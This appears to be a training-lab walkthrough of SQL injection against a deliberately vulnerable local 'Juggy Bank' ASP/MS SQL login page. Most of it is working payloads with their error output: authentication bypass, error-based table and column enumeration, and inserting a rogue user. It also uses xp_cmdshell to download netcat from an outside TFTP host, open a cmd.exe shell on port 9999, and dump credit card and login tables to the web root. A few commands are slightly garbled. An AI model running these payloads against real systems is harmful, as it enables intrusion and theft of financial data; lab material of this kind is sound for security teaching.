Lab Juggy Bank SQL injection
Trang 1Juggy Bank SQL Injection Lab
First of all let’s work out what data base the system is running
On your 2003 Server, open your web browser on type http://localhost/client2.htm You should have an entry that shows the Juggy Bank web page
In the Login Name box type a single quote ‘ and press return
This should return and error page showing the database type and the asp script that has run
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password = ''
/login.asp, line 5
As can be seen the back end database is running on MS SQL and the service doesn’t handle error messages by redirecting to an oooops page
Now let’s try blind SQL injecting into the Login Name box This should bypass the authentication system
In the Login box type
luke' or 1=1
This then makes the SQL statement passed to the database as follows
select * from userinfo where username=’luke’ or 1=1 and password=’’ Anything after the is ignored as a comment
This should log you into the web page as the first user on the database
Now let’s go back to the login screen and try enumerating the table The first thing we need is the table name Insert into the login box the following
' having 1=1
This will cause the following error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
Trang 2[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'userinfo.username' is invalid in the select list because it is not contained
in an aggregate function and there is no GROUP BY clause
/login.asp, line 5
Notice the highlighted information, this is the Table name - userinfo and the column name - username
Now we need to know the next columns in the table, type the following in the Login box
' group by userinfo.username having 1=1
This causes the following error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'userinfo.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause
/login.asp, line 5
Now let’s try once more with the userinfo.password
' group by userinfo.password having 1=1
We get the same column again, indicating two columns in the userinfo table
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'userinfo.username' is invalid in the select list because it is not contained
in either an aggregate function or the GROUP BY clause
/login.asp, line 5
We must now enumerate the column types
' union select sum(username) from userinfo
Which gives the following error indicating type is varchar
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
Trang 3[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument /login.asp, line 5
Trang 4And same for the password column
' union select sum(password) from userinfo
Which is also a varchar
Now let’s create a new user
' ; insert into userinfo values('john','password')
Login with the new user created
Further Investigation
Now let’s get some information on other databases
Let put a file on the web server
'; exec master xp_cmdshell "echo I was here on %date% >
c:\inetpub\wwwroot\Boo.txt"
To check that the file is on the server open http://localhost/Boo.txt
To fetch a file from a TFTP server e.g netcat from 172.16.0.11 server
'; exec master xp_cmdshell 'tftp -i 172.16.0.11 get nc.exe
c:\inetpub\wwwroot\nc.exe'
and then execute it listening on port 9999
';exec master xp_cmdshell 'c:\inetpub\wwwroot\nc.exe -L -d -e cmd.exe -p 9999'
You should now be able to telnet to the localhost on port 9999
Now let’s dump the credit card details into a txt file
';exec master xp_cmdshell 'osql -E -Q "select * from
juggybank creditcard" -o c:\inetpub\wwwroot\card_details.txt'
Trang 5To fetch those details off the web server browse to the page
http://localhost/card_details.txt
To dump the login details
';exec master xp_cmdshell 'osql E Q "select * from juggybank userinfo"
-o c:\inetpub\wwwr-o-ot\l-ogins.txt'
To fetch those details off the web server browse to the page
http://localhost/logins.txt
Similar commands con be run to mine data on sysdatabases
';exec master xp_cmdshell 'osql -E -Q "select * from
master sysdatabases" -o c:\inetpub\wwwroot\masterdatabase.txt'
';exec master xp_cmdshell 'osql -E -Q "select * from
juggybank sysobjects where xtype=''u'' " -o
c:\inetpub\wwwroot\juggybanktables.txt'
In the above statement xtype=’’u’’ is actually two sets of single quotes not a double
To fetch those details off the web server browse to the page
http://localhost/masterdatabase.txt
and
http://localhost/juggybanktables.txt
Another way with stored procedures
The above can be achieved by using a stored procedure
'; exec sp_makewebtask "c:\inetpub\wwwroot\evil.html", "select * from userinfo";
Now request this page with http://localhost/evil.html